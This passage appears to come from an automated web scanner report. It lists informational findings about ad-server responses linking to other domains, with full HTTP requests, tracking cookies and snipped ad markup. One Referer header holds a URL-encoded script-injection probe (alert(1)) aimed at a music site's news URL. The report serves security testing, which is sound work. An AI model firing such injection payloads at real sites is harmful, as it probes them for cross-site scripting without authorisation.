Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=;sz=300x250;ord=3d088ae512? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38825
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:08:48 GMT
Expires: Mon, 09 May 2011 14:08:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
908130%3B4307-300/250%3B41654573/41672360/1%3B%3B%7Esscs%3D%3fhttp://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=http://">
<IMG SRC="http://s0.2mdn.net/1577870/PID_1588089_FP_S11_MPU_300x250.gif" width="300" height="250" BORDER="0" alt="">
</A>
...[SNIP]...
15.4. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/d%3B236799042%3B1-0%3B0%3B60352415%3B3454-728/90%3B40792835/40810622/2%3B%3B%7Esscs%3D%3fhttp://www.chicago.buyatoyota.com/MaySales"><img src="http://s0.2mdn.net/3029224/11SE_MRSE_GENERIC_UNDER40K_BACKUP_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
</script>
<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
15.5. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri May 06 13:07:08 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ap.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe"><img src="http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://cdn.doubleverify.com/script152.js?agnc=563308&cmp=5229711&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=63617239&advid=998766&sid=327761&adid="></script>
...[SNIP]...
15.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/mnum=0000884214/cstr=29047542=_4dc7f368,4264037248,743832%5E884214%5E81%5E0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=;ord=4264037248? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 553
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:10 GMT
Expires: Mon, 09 May 2011 14:00:10 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/c/b2/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click
...[SNIP]...
dc7f368,4264037248,743832%5E884214%5E81%5E0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
15.7. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn~~!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44~~!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr~~!#h.N!!!!#<yMiw!#k]4~~!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w~~!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI~~!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bbbd3235f1e96dfce%253B12fd50eda48%2C0%253B%253B%253B2291833273%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAR9oO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQBBuAEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496111384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="468" height="60"><script language="JavaScript" type="text/javascript">
...[SNIP]...
ICode=2250555&pub=321582&partnerID=64&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel&redirectURL=http://clk.atdmt.com/COM/go/286738722/direct;wi.468;hi.60/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/286738722/direct;wi.468;hi.60/01/" /></a></noscript></iframe> <img src='http://t.invitemedia.com/track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496111384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=64" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...
15.8. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?qgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAAEkwcFvb2CEAfhetRuB4VQJMkCFdAARpAAAAAAAAAJkCTJAhXQAEaQAAAAAAAACZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADtn0Nh.dcQCppBTeTDrpfD0OJ3wGgTcPnYn7lHAAAAAA==,,http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly-publicized-murder-caylee-anthony-rivets-enrages,Z%3D728x90%26s%3D1806342%26r%3D1%26_salt%3D767396576%26u%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages,b2580d06-7a44-11e0-b3e1-cfa36ff23e07 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
